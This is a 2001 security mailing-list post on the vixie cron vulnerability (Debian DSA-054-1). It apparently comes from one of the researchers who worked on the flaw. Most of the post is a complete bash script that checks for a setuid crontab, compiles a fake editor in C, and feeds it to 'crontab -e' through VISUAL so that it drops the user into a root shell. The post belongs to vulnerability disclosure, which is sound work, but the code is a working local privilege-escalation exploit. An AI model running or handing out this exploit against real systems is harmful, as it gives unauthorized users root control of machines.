On Mon, 7 May 2001, Cade Cairns wrote:

> Attached is a simple proof of concept for the vixie cron vulnerability
> recently published in Debian Security Advisory DSA-054-1. The code was
> written during SIA analysis of this vulnerability.

Hm, here is my original proof-of-concept I coded for Sebastian Krahmer
(who discovered this vulnerability), while working on it. This
vulnerability affects Debian, SuSE, and probably a few other Linuxes as
well. It is a perfect example of bad coding, and how improper fixing of
bugs might lead to even more dangerous conditions. It is fully automated,
and I believe it gives absolutely nothing to the attacker, as this
vulnerability can be exploited by hand in approximately 5 seconds ;)

Michal Zalewski
http://lcamtuf.coredump.cx

#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <[EMAIL PROTECTED]>                   |"
echo "| Michal Zalewski <[EMAIL PROTECTED]>                     |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* Fake editor handed to crontab -e through the VISUAL variable. */
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    /* Unprivileged invocation: leave an invalid crontab behind. */
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else { 
    /* Privileged invocation: crontab ran the editor with euid 0. */
    dup2(1,0); 
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n"); 
    system("touch $HOME/.xploited");
    system("bash"); 
  }
  return 0;
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi

